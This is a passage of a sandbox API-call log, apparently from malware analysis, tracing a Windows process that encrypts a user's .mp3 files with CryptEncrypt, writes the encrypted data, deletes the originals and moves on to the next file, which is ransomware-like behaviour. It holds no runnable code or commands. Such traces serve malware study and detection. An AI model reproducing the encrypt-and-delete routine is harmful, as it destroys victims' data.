cchLength=0xb | out: lpsz="byte[66625]") returned 0xb [0111.713] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.714] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0x10430, dwBufLen=0x10440 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0x10440) returned 1 [0111.714] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.714] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.714] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.714] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x10440, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x10440, lpOverlapped=0x0) returned 1 [0111.716] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0111.716] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0111.717] CryptDestroyKey (hKey=0x41ac640) returned 1 [0111.717] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.717] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.804] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0111.804] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0111.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.804] FreeLibrary (hLibModule=0x756e0000) returned 1 [0111.804] CloseHandle (hObject=0x298) returned 1 [0111.804] CloseHandle (hObject=0x258) returned 1 [0111.807] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3", lpFilePart=0x0) returned 0x31 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0111.807] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\bg_rcfis42y.mp3")) returned 0x20 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0111.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0111.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0111.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0111.808] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ca2b470, ftCreationTime.dwHighDateTime=0x1d5ec0d, ftLastAccessTime.dwLowDateTime=0x94593bc0, ftLastAccessTime.dwHighDateTime=0x1d5ec5c, ftLastWriteTime.dwLowDateTime=0x94593bc0, ftLastWriteTime.dwHighDateTime=0x1d5ec5c, nFileSizeHigh=0x0, nFileSizeLow=0x10430, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bg_rcFiS42y.mp3", cAlternateFileName="BG_RCF~1.MP3")) returned 0x41ac280 [0111.809] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\bg_rcfis42y.mp3")) returned 1 [0111.857] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ca2b470, ftCreationTime.dwHighDateTime=0x1d5ec0d, ftLastAccessTime.dwLowDateTime=0x94593bc0, ftLastAccessTime.dwHighDateTime=0x1d5ec5c, ftLastWriteTime.dwLowDateTime=0x94593bc0, ftLastWriteTime.dwHighDateTime=0x1d5ec5c, nFileSizeHigh=0x0, nFileSizeLow=0x10430, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bg_rcFiS42y.mp3", cAlternateFileName="BG_RCF~1.MP3")) returned 0 [0111.857] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0111.858] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0111.858] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0111.858] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.858] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.858] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0111.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f68 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0111.859] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0111.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.860] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.860] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa25e60, ftCreationTime.dwHighDateTime=0x1d5ef94, ftLastAccessTime.dwLowDateTime=0xaaabc190, ftLastAccessTime.dwHighDateTime=0x1d5e676, ftLastWriteTime.dwLowDateTime=0xaaabc190, ftLastWriteTime.dwHighDateTime=0x1d5e676, nFileSizeHigh=0x0, nFileSizeLow=0xfc5a, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="D4sWWmt- Hf4jGE2.mp3", cAlternateFileName="D4SWWM~1.MP3")) returned 0x41ac2c0 [0111.860] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0111.860] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0111.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0111.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0111.861] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0111.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0111.861] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0111.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0111.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0111.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0111.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0111.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0111.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0111.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0111.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.863] HeapFree (in: hHeap=0x1780000, 